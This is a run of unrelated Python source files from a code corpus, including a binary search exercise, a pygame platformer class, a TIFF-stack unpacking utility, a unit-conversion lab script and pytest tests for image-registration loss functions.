'refused_objectives',\r\n 'afford',\r\n 'appointment_reason',\r\n 'currentkeywords',\r\n \"Berekeningen\",\r\n \"visit_timestamps\",\r\n #\"soltest_-_rule_based\",\r\n 'mr_geo_city_name',\r\n 'mr_geo_zipcode'\r\n\r\n ],\r\n \"bool_datetimes\" : [\r\n \"calc_max_mortgage_allow_date\",\r\n \"cookies_accepted_date\",\r\n \"calc_monthly_costs_date\",\r\n 'search_state_date',\r\n 'calc_afford_home_date',\r\n \"AfspraakDatum\",\r\n #\"calc_visit_-_pakket_advies\",\r\n 'Brand-Vestigingnummer-date',\r\n 'calc_home_value',\r\n 'brand_-_afspraak_maken_visit_page_-_visit_date',\r\n 'bkr_date',\r\n 'calc_home_value_date',\r\n 'brand_-_featured_button_click_-_date',\r\n 'brand_-_rbs-id_-_date',\r\n 'calc_visit_-_pakket_advies',\r\n 'login_date',\r\n 'propositiekiezer_-_visit_step_1',\r\n 'home_have_in_mind_date',\r\n\r\n ],\r\n \"occurence_counts\" : [\r\n \"calculator_used\"\r\n ],\r\n \"list_vars\":\r\n [\r\n 'url-name',\r\n 'recentlyvieweditems',\r\n 'keywords',\r\n \"interactions_viewed\",\r\n 'visitedsites',\r\n 'interactions_clicked',\r\n 'interactions_converted',\r\n ]\r\n }\r\n\r\n","sub_path":"Stage_of_life/variabelen_levensfase.py","file_name":"variabelen_levensfase.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"5737644","text":"def binary_search(arr, target, start, end):\n while start <= end:\n mid = (start + end) // 2\n if target == arr[mid]:\n return mid\n\n elif target < arr[mid]:\n end = mid - 1\n else:\n start = mid + 1\n return None\n\n\nn = int(input()) # 가계부품\nn_arr = list(map(int, input().split()))\nn_arr.sort()\n\nm = int(input()) # 찾는 부품\nm_arr = list(map(int, input().split()))\n\nfor i in m_arr:\n result = binary_search(n_arr, i, 0, n - 1)\n if result != None:\n print(\"yes\", end=\" \")\n else:\n print(\"no\", end=\" \")\n","sub_path":"Book/Binary_Search/Binary_Search_1.py","file_name":"Binary_Search_1.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"481012887","text":"import pygame\nfrom PyQt5.QtCore import pyqtSignal\n\nfrom model.entity.game_entities.meta_game import Game\nfrom model.entity.objects_for_game.move_object import Move_object\nfrom model.logic.camera_logic.camera_module import Camera\nfrom model.logic.player_logic.operation_under_player import OperationUnderPlayer\nfrom veiw.view_on_desctop_screen import VeiwOnDesctop\n\n\nclass SecondGame(Game):\n win_sign = pyqtSignal()\n def __init__(self):\n super(SecondGame, self).__init__()\n\n self.left = False\n self.right = False\n self.up = True\n\n def read_data_from_client(self, data):\n\n list_data = data.split(' ')\n while len(list_data) != 1:\n if list_data[0] == 'h':\n self.hero.rect.x, self.hero.rect.y = int(list_data[1]), int(list_data[2])\n list_data = list_data[3:]\n elif list_data[0] == 'b':\n pl_new = Move_object(int(list_data[1]), int(list_data[2]),self.path_to_texture)\n self.falling_down_group.add(pl_new)\n self.platforms2.append(pl_new)\n list_data = list_data[3:]\n\n def filling_and_rending_obj(self):\n\n self.screen.fill((150, 25, 210))\n Camera.rendering_on_screen_objects(self.screen,self.hero,self.hero2)\n Camera.rendering_on_screen_platforms(self.screen,self.sprite_group, self.hero2)\n Camera.rendering_on_screen_platforms(self.screen, self.falling_down_group, self.hero2)\n VeiwOnDesctop.blitting_screen_on_window(self.window,self.screen,(0,0))\n\n def hero_updating(self):\n OperationUnderPlayer.update(self.hero2, self.platforms, left=self.left, right=self.right, up=self.up)\n self.left, self.right, self.up = False, False, False\n\n def hero_colliding(self):\n\n OperationUnderPlayer.collide(self.hero2, 0, self.hero2.yvel, self.platforms)\n OperationUnderPlayer.collide(self.hero2,self.hero2.xvel, 0, self.platforms)\n OperationUnderPlayer.collide(self.hero2,0, self.hero2.yvel, self.platforms2)\n OperationUnderPlayer.collide(self.hero2,self.hero2.xvel, 0, self.platforms2)\n\n def game_loop(self):\n\n self.sign_read.emit('h ' + str(self.hero2.rect.x) + \" \" + str(self.hero2.rect.y) +\" \" )\n\n for i in pygame.event.get():\n\n if i.type == pygame.QUIT:\n self.timer.stop()\n\n ##action for first player\n\n if i.type == pygame.KEYDOWN:\n\n if pygame.key.get_pressed()[97]:\n self.left=True\n\n if pygame.key.get_pressed()[100]:\n self.right = True\n\n if pygame.key.get_pressed()[119]:\n self.win_sign.emit()\n self.up=True\n\n self.check_colliding_between_platforms()\n self.hero_colliding()\n self.hero_updating()\n self.filling_and_rending_obj()\n pygame.display.flip()\n self.timer_tick.tick(50)\n\n\n","sub_path":"model/entity/game_entities/game_for_second.py","file_name":"game_for_second.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"255981704","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 14 15:11:42 2020\n\n@author: Rohan Prateek\n\"\"\"\n\ndef addStr(str1, str2):\n \n s1 = [x for x in str1] # making list of all chars in strings\n s2 = [x for x in str2]\n \n for i in range(len(s2)): # putting all characters into single list\n s1.append(s2[i]) \n add_list = ''.join(s1) # joining all characters to get concatenated string\n \n return add_list\n \n \na = 'Rohan'\nb = 'Prateek'\nprint(addStr(a, b))","sub_path":"string_concat.py","file_name":"string_concat.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"99989436","text":"from rest_framework.response import Response\n\n\nclass ApiResponse(Response):\n def __init__(self, data_status=200,data_message='提示信息',result=None,http_status=None,headers=None,\n exception=False,**kwargs):\n data={\n 'status':data_status,\n 'message':data_message,\n }\n #判断result\n if result:\n data['result']=result\n #接受参数\n data.update(kwargs)\n super().__init__(data=data,status=http_status,headers=headers,exception=exception)\n","sub_path":"drf_ems/utils/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"618861712","text":"class Solution:\n def movesToChessboard(self, board):\n \"\"\"\n :type board: List[List[int]]\n :rtype: int\n \"\"\"\n step1 = 0\n step2 = 0\n one = []\n zero = []\n for i in range(len(board[0])):\n if board[0][i] == 1:\n one.append(i)\n else:\n zero.append(i)\n print(one)\n print(zero)\n if len(one) != len(zero):\n return -1\n else:\n order1 = []\n order2 = []\n for i in range(len(one)):\n order1.append(one[i])\n order1.append(zero[i])\n order2.append(zero[i])\n order2.append(one[i])\n for i in range(len(order1)):\n if i != order1[i]:\n step1 += 1\n if i != order2[i]:\n step2 += 1\n\n \n\nif __name__ == '__main__':\n s = Solution()\n print(s.movesToChessboard([[0, 1, 1, 0], [0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 0, 1]]))\n","sub_path":"0782-Transform to Chessboard.py","file_name":"0782-Transform to Chessboard.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"35168799","text":"import os, re, sys\n\nimport pandas as pd\nimport skimage\nimport skimage.io\n\nfrom mk_analysis import files\n\n# ie: 20181010_example_A1.tif\nregex_image = \"(.*)\\.tif\"\n# ie: 20181010_example_A1_0012.tif (12th image/slice in stack A1)\nregex_single = \".*\\-\\d{4}\\.tif\"\n# compile regex patterns to use\nre_image = re.compile(regex_image)\nre_single = re.compile(regex_single)\n\n#######################\n### misc. functions ###\n#######################\n\n# clear terminal screen based on OS\ndef clear():\n \n if sys.platform == 'win32':\n\n clear = 'cls'\n \n else:\n \n clear = 'clear'\n \n os.system(clear)\n\n# create folders for your project\ndef create_folder(image_folder,folder):\n\n os.makedirs(os.path.join(image_folder, folder), exist_ok=True)\n new_folder = os.path.join(image_folder,folder)\n\n return new_folder\n\n#######################\n### regex functions ###\n#######################\n\n# create image df from tiff stacks\ndef create_image_df(image_folder):\n \n image_files_dict = [make_dict(f, image_folder, re_image) for f in os.listdir(image_folder) if check_file(f, re_image, re_single)]\n image_df = pd.DataFrame(image_files_dict)\n \n return image_df\n\n# create single image df by checking for unpacked, single, 8-bit tiffs using RE\ndef create_single_df(image_folder):\n \n image_files_dict = [make_dict(f, image_folder, re_single) for f in os.listdir(image_folder) if is_single(f, re_single)]\n image_df = pd.DataFrame(image_files_dict)\n \n return image_df\n\n# create python dictionary storing file paths and stack names\ndef make_dict(filename, path, re_obj):\n \n my_dict = re_obj.match(filename).groupdict()\n my_dict[\"filename\"] = filename\n my_dict[\"path\"] = path\n\n return my_dict\n\n# check if tiff stack, and not single image\ndef check_file(filename, re_image, re_single):\n \n mybool = False\n \n if ( re_image.match(filename) != None \n and re_single.match(filename) == None\n ):\n \n mybool = True\n \n return mybool\n\n# check if filename is a single image\ndef is_single(filename, re_obj):\n \n mybool = False\n \n if re_obj.match(filename) != None:\n \n mybool = True\n \n return mybool\n\n##################################################\n## Unpack tiffs using Regex Functions & Skimage ## \n##################################################\n\ndef unpack(image_folder, single_folder):\n\n image_df = create_image_df(image_folder)\n\n timepoints, unpack_done = check_tiffs(image_df,image_folder,single_folder)\n\n if image_df.empty is True:\n\n sys.exit(\">>> No tiff stacks to unpack.\")\n\n elif image_df.empty is False and unpack_done is True:\n \n print(\">> Tiff stacks unpacked..\")\n \n return timepoints\n\n elif image_df.empty is False and unpack_done is False:\n \n print(\">> Unpacking tiffs..\")\n \n unpack_tiffs(image_df, single_folder, timepoints)\n\n return timepoints\n\n else:\n\n sys.exit()\n\n# Converts tiff stacks to 8-bit grayscale. Uses first stack from check_tiffs to check that \n# all tiff stacks are the same length\ndef unpack_tiffs(image_df,folder,ref_timepoints):\n \n for n in image_df.index:\n \n image = skimage.io.imread(os.path.join(image_df[\"path\"][n], image_df[\"filename\"][n]))\n timepoints = image.shape[0]\n\n if len(image.shape) < 4:\n \n retest = re_image.match(image_df[\"filename\"][n])\n retest.group(1)\n new_filename = \"{0}-{1:04d}.tif\".format(retest.group(1), 0)\n\n image2 = skimage.color.rgb2gray(image)\n image2 = skimage.img_as_ubyte(image2)\n skimage.io.imsave(os.path.join(image_df[\"path\"][n], new_filename), image2)\n\n # Check if timepoints for current stack matches first stack # \n elif timepoints == ref_timepoints:\n \n for i in range(timepoints):\n \n retest = re_image.match(image_df[\"filename\"][n])\n retest.group(1)\n new_filename = \"{0}-{1:04d}.tif\".format(retest.group(1), i)\n\n image2 = skimage.color.rgb2gray(image[i,:,:,:])\n image2 = skimage.img_as_ubyte(image2)\n skimage.io.imsave(os.path.join(image_df[\"path\"][n], folder, new_filename), image2)\n\n else:\n \n sys.exit(\">>> Error: The first stack is {0} frames long. {2} has {3}.\".format(ref_timepoints, image, timepoints))\n\n# num of tiff stacks x num frames in stack == num unpacked single images\ndef check_tiffs(image_dataframe, image_folder, single_folder):\n\n stack_list = files.make_image_list(image_folder,'.tif')\n single_list = files.make_image_list(single_folder,'.tif')\n\n first_stack = skimage.io.imread(os.path.join(image_dataframe[\"path\"][0], image_dataframe[\"filename\"][0]))\n timepoints = first_stack.shape[0]\n\n if len(single_list) == (len(stack_list) * timepoints):\n\n unpack_done = True\n \n else:\n \n unpack_done = False\n\n return timepoints, unpack_done\n\n################################\n### lite unpack (w/o checks) ###\n################################\n\n# Unpack tiff stacks using create_image_df & unpack_stacks #\ndef unpack_lite(image_folder,single_folder):\n\n image_df = create_image_df(image_folder)\n \n print(\">> Unpacking tiffs..\")\n \n unpack_tiffs_lite(image_df, single_folder)\n\ndef unpack_tiffs_lite(image_df,folder):\n \n for n in image_df.index:\n \n image = skimage.io.imread(os.path.join(image_df[\"path\"][n], image_df[\"filename\"][n]))\n\n if len(image.shape) < 4:\n \n retest = re_image.match(image_df[\"filename\"][n])\n retest.group(1)\n new_filename = \"{0}-{1:04d}.tif\".format(retest.group(1), 0)\n\n image2 = skimage.color.rgb2gray(image)\n image2 = skimage.img_as_ubyte(image2)\n skimage.io.imsave(os.path.join(image_df[\"path\"][n], new_filename), image2)\n\n else:\n \n timepoints = image.shape[0]\n \n for i in range(timepoints):\n\n retest = re_image.match(image_df[\"filename\"][n])\n retest.group(1)\n new_filename = \"{0}-{1:04d}.tif\".format(retest.group(1), i)\n\n image2 = skimage.color.rgb2gray(image[i,:,:,:])\n image2 = skimage.img_as_ubyte(image2)\n skimage.io.imsave(os.path.join(image_df[\"path\"][n], folder, new_filename), image2)","sub_path":"mk_analysis/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"492500885","text":"# Programmers: [Tarah Sipos, Zoe Garceau]\n# Course: CS151, Dr. Kenyon\n# Date: [September 13, 2018]\n# Lab Assignment: [Lab1]\n# Problem Statement: [Our program will help calculate the number of teaspoons and tablespoons from mL]\n# Data In: [The amount of mL]\n# Data Out: [the conversion to teaspoons and tablespoons]\n# Other files needed: [none]\n# Credits: [lab example]\n\nmL = float(input(\"How many mL do you have?\\n\"))\n\ntsp = mL/5\n\ntbsp = round(tsp/3, 2)\n\n# print(\"there are\", tbsp, tsp)\nprint(\"There are \" + str(tbsp) + \" tablesspoons in \" + str(mL) + \" mL.\")\n","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109370289","text":"# coding=utf-8\n\n\"\"\"\nTests for deepreg/model/loss/label.py in\npytest style\n\"\"\"\n\nfrom test.unit.util import is_equal_tf\n\nimport numpy as np\nimport pytest\nimport tensorflow as tf\n\nimport deepreg.model.loss.label as label\n\n\ndef test_gauss_kernel1d_0():\n \"\"\"\n Testing case where sigma = 0, expect 0 return\n \"\"\"\n sigma = tf.constant(0, dtype=tf.float32)\n expect = tf.constant(0, dtype=tf.float32)\n get = label.gauss_kernel1d(sigma)\n assert get == expect\n\n\ndef test_gauss_kernel1d_else():\n \"\"\"\n Testing case where sigma is not 0,\n expect a tensor returned.\n \"\"\"\n sigma = 3\n get = tf.cast(label.gauss_kernel1d(sigma), dtype=tf.float32)\n expect = [\n np.exp(-0.5 * x ** 2 / sigma ** 2) for x in range(-sigma * 3, sigma * 3 + 1)\n ]\n expect = tf.convert_to_tensor(expect, dtype=tf.float32)\n expect = expect / tf.reduce_sum(expect)\n assert is_equal_tf(get, expect)\n\n\ndef test_cauchy_kernel_0():\n \"\"\"\n Test case where sigma = 0, expect 0 return.\n \"\"\"\n sigma = tf.constant(0, dtype=tf.float32)\n expect = tf.constant(0, dtype=tf.float32)\n get = label.cauchy_kernel1d(sigma)\n assert get == expect\n\n\ndef test_cauchy_kernel_else():\n \"\"\"\n Test case where sigma is not 0, expect\n tensor returned.\n \"\"\"\n sigma = 3\n get = tf.cast(label.cauchy_kernel1d(sigma), dtype=tf.float32)\n expect = [1 / ((x / sigma) ** 2 + 1) for x in range(-sigma * 5, sigma * 5 + 1)]\n expect = tf.convert_to_tensor(expect, dtype=tf.float32)\n expect = expect / tf.reduce_sum(expect)\n assert is_equal_tf(get, expect)\n\n\ndef test_foreground_prop_binary():\n \"\"\"\n Test foreground function with a\n tensor of zeros with some ones, asserting\n equal to known precomputed tensor.\n Testing with binary case.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n expect = tf.convert_to_tensor([1.0 / 3, 1.0 / 3, 1.0 / 3], dtype=tf.float32)\n get = label.foreground_proportion(tensor_eye)\n assert is_equal_tf(get, expect)\n\n\ndef test_foreground_prop_simple():\n \"\"\"\n Test foreground functions with a tensor\n of zeros with some ones and some values below\n one to assert the thresholding works.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, 0, :, :] = 0.4 * array_eye # 0\n tensor_eye[:, 1, :, :] = array_eye\n tensor_eye[:, 2, :, :] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n expect = [54 / (27 * 9), 54 / (27 * 9), 54 / (27 * 9)]\n get = label.foreground_proportion(tensor_eye)\n assert is_equal_tf(get, expect)\n\n\ndef test_jaccard_index():\n \"\"\"\n Testing jaccard index function with computed\n tensor.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6]) - num\n\n get = num / denom\n expect = label.jaccard_index(tensor_eye, tensor_pred)\n assert is_equal_tf(get, expect)\n\n\ndef test_dice_not_binary():\n \"\"\"\n Testing dice score with binary tensor\n comparing to a precomputed value.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = 2 * np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6])\n\n get = num / denom\n expect = label.dice_score(tensor_eye, tensor_pred)\n assert is_equal_tf(get, expect)\n\n\ndef test_dice_binary():\n \"\"\"\n Testing dice score with not binary tensor\n to assert thresholding works.\n \"\"\"\n array_eye = 0.6 * np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = 2 * np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6])\n\n get = num / denom\n expect = label.dice_score(tensor_eye, tensor_pred, binary=True)\n assert is_equal_tf(get, expect)\n\n\ndef test_dice_general():\n \"\"\"\n Testing general dice function with\n non binary features and checking\n against precomputed tensor.\n \"\"\"\n array_eye = 0.6 * np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n y_prod = np.sum(tensor_eye * tensor_pred, axis=(1, 2, 3))\n y_sum = np.sum(tensor_eye, axis=(1, 2, 3)) + np.sum(tensor_pred, axis=(1, 2, 3))\n\n num = 2 * y_prod\n den = y_sum\n expect = num / den\n get = label.dice_score_generalized(tensor_eye, tensor_pred)\n\n assert is_equal_tf(get, expect)\n\n\ndef test_weighted_bce():\n \"\"\"\n Checking binary cross entropy calculation\n against a precomputed tensor.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.constant(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.constant(tensor_pred, dtype=tf.float32)\n\n expect = [1.7908996, 1.7908996, 1.7908996]\n get = label.weighted_binary_cross_entropy(tensor_eye, tensor_pred)\n assert is_equal_tf(get, expect)\n\n\ndef test_separable_filter_0():\n \"\"\"\n Testing separable filter with case where\n 0 length vector is passed.\n \"\"\"\n pass\n # kernel = np.empty((0))\n # array_eye = np.identity(3, dtype=np.float32)\n # get = label.separable_filter3d(array_eye, kernel)\n # expect = array_eye\n # assert is_equal_tf(get, expect)\n\n\ndef test_separable_filter_else():\n \"\"\"\n Testing separable filter case where non\n zero length tensor is passed to the\n function.\n \"\"\"\n k = np.ones((3, 3, 3, 3), dtype=np.float32)\n array_eye = np.identity(3, dtype=np.float32)\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, :, 0, 0] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n k = tf.convert_to_tensor(k, dtype=tf.float32)\n\n expect = np.ones((3, 3, 3, 3), dtype=np.float32)\n expect = tf.convert_to_tensor(expect, dtype=tf.float32)\n\n get = label.separable_filter3d(tensor_pred, k)\n assert is_equal_tf(get, expect)\n\n\ndef test_compute_centroid():\n \"\"\"\n Testing compute centroid function\n and comparing to expected values.\n \"\"\"\n tensor_mask = np.zeros((3, 2, 2, 2))\n tensor_mask[0, :, :, :] = np.ones((2, 2, 2))\n tensor_mask = tf.constant(tensor_mask, dtype=tf.float32)\n\n tensor_grid = np.ones((2, 2, 2, 3))\n tensor_grid[:, :, :, 1] *= 2\n tensor_grid[:, :, :, 2] *= 3\n tensor_grid = tf.constant(tensor_grid, dtype=tf.float32)\n\n expected = np.ones((3, 3)) # use 1 because 0/0 ~= (0+eps)/(0+eps) = 1\n expected[0, :] = [1, 2, 3]\n got = label.compute_centroid(tensor_mask, tensor_grid)\n assert is_equal_tf(got, expected)\n\n\ndef test_compute_centroid_d():\n \"\"\"\n Testing compute centroid distance between equal\n tensors returns 0s.\n \"\"\"\n array_ones = np.ones((2, 2))\n tensor_mask = np.zeros((3, 2, 2, 2))\n tensor_mask[0, :, :, :] = array_ones\n tensor_mask = tf.convert_to_tensor(tensor_mask, dtype=tf.float32)\n\n tensor_grid = np.zeros((2, 2, 2, 3))\n tensor_grid[:, :, :, 0] = array_ones\n tensor_grid = tf.convert_to_tensor(tensor_grid, dtype=tf.float32)\n\n get = label.compute_centroid_distance(tensor_mask, tensor_mask, tensor_grid)\n expect = np.zeros((3))\n assert is_equal_tf(get, expect)\n\n\ndef test_squared_error():\n \"\"\"\n Testing squared error function by comparing\n to precomputed tensor.\n \"\"\"\n tensor_mask = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_mask[0, 0, 0, 0] = 1\n tensor_mask = tf.convert_to_tensor(tensor_mask, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, :, :, :] = 1\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n expect = np.array([26 / 27, 1.0, 1.0])\n get = label.squared_error(tensor_mask, tensor_pred)\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_dice():\n \"\"\"\n Testing single sclare loss returns\n precomputed, known dice loss for given\n inputs.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = 2 * np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6])\n\n expect = 1 - (num / denom)\n get = label.single_scale_loss(tensor_eye, tensor_pred, \"dice\")\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_bce():\n \"\"\"\n Testing bce single scale loss entry\n returns known loss tensor for given inputs.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n expect = [1.7908996, 1.7908996, 1.7908996]\n get = label.single_scale_loss(tensor_eye, tensor_pred, \"cross-entropy\")\n\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_dg():\n \"\"\"\n Testing generalised dice loss single\n scale loss function returns known loss\n tensor for given inputs.\n \"\"\"\n array_eye = 0.6 * np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n y_prod = np.sum(tensor_eye * tensor_pred, axis=(1, 2, 3))\n y_sum = np.sum(tensor_eye, axis=(1, 2, 3)) + np.sum(tensor_pred, axis=(1, 2, 3))\n\n num = 2 * y_prod\n den = y_sum\n expect = 1 - num / den\n get = label.single_scale_loss(tensor_eye, tensor_pred, \"dice_generalized\")\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_jacc():\n \"\"\"\n Testing single scale loss returns known loss\n tensor when called with jaccard argment.\n \"\"\"\n array_eye = np.identity(3, dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_pred[:, 0:2, :, :] = array_eye\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n\n num = np.array([6, 6, 6])\n denom = np.array([9, 9, 9]) + np.array([6, 6, 6]) - num\n\n expect = 1 - (num / denom)\n get = label.single_scale_loss(tensor_eye, tensor_pred, \"jaccard\")\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_mean_sq():\n \"\"\"\n Test single scale loss function returns\n known mean sq value tensor when passed with\n mean squared arg,\n \"\"\"\n tensor_mask = np.zeros((3, 3, 3, 3))\n tensor_mask[0, 0, 0, 0] = 1\n tensor_mask = tf.convert_to_tensor(tensor_mask, dtype=tf.float32)\n\n tensor_pred = tf.convert_to_tensor(np.ones((3, 3, 3, 3)), dtype=tf.float32)\n expect = tf.convert_to_tensor(np.array([26 / 27, 1.0, 1.0]), dtype=tf.float32)\n\n get = label.single_scale_loss(tensor_mask, tensor_pred, \"mean-squared\")\n assert is_equal_tf(get, expect)\n\n\ndef test_single_scale_loss_other():\n \"\"\"\n Test value error raised if non supported\n string passed to the single scale loss function.\n \"\"\"\n tensor_eye = tf.convert_to_tensor(np.zeros((3, 3, 3, 3)), dtype=tf.float32)\n tensor_pred = tf.convert_to_tensor(np.zeros((3, 3, 3, 3)), dtype=tf.float32)\n\n with pytest.raises(ValueError):\n label.single_scale_loss(tensor_eye, tensor_pred, \"random\")\n\n\ndef test_multi_scale_loss_pred_len():\n \"\"\"\n Test assertion error raised if a wrongly sized tensor\n is passed to the multi-scale loss function.\n \"\"\"\n tensor_true = tf.convert_to_tensor(np.zeros((3, 3, 3, 3)), dtype=tf.float32)\n tensor_pred = tf.convert_to_tensor(np.zeros((3, 3, 3)), dtype=tf.float32)\n with pytest.raises(AssertionError):\n label.multi_scale_loss(\n tensor_true, tensor_pred, loss_type=\"jaccard\", loss_scales=[0, 1, 2]\n )\n\n\ndef test_multi_scale_loss_true_len():\n \"\"\"\n Test assertion error raised if a wrongly sized tensor\n is passed to the multi-scale loss function.\n \"\"\"\n tensor_true = tf.convert_to_tensor(np.zeros((3, 3, 3)), dtype=tf.float32)\n tensor_pred = tf.convert_to_tensor(np.zeros((3, 3, 3, 3)), dtype=tf.float32)\n with pytest.raises(AssertionError):\n label.multi_scale_loss(\n tensor_true, tensor_pred, loss_type=\"jaccard\", loss_scales=[0, 1, 2]\n )\n\n\ndef test_multi_scale_loss_kernel():\n \"\"\"\n Test multi-scale loss kernel returns the appropriate\n loss tensor for same inputs and jaccard cal.\n \"\"\"\n loss_values = [1, 2, 3]\n array_eye = np.identity(3, dtype=np.float32)\n tensor_pred = np.zeros((3, 3, 3, 3), dtype=np.float32)\n tensor_eye = np.zeros((3, 3, 3, 3), dtype=np.float32)\n\n tensor_eye[:, :, 0:3, 0:3] = array_eye\n tensor_pred[:, :, 0, 0] = array_eye\n tensor_eye = tf.convert_to_tensor(tensor_eye, dtype=tf.float32)\n tensor_pred = tf.convert_to_tensor(tensor_pred, dtype=tf.float32)\n expect = tf.constant([0.9938445, 0.9924956, 0.9938445], dtype=tf.float32)\n get = label.multi_scale_loss(tensor_eye, tensor_pred, \"jaccard\", loss_values)\n assert is_equal_tf(get, expect)\n\n\nclass TestGetSimilarityFn:\n batch_size = 2\n image_size = (3, 4, 5)\n y_true = tf.zeros((batch_size, *image_size), dtype=tf.float32)\n y_pred = tf.zeros((batch_size, *image_size), dtype=tf.float32)\n\n 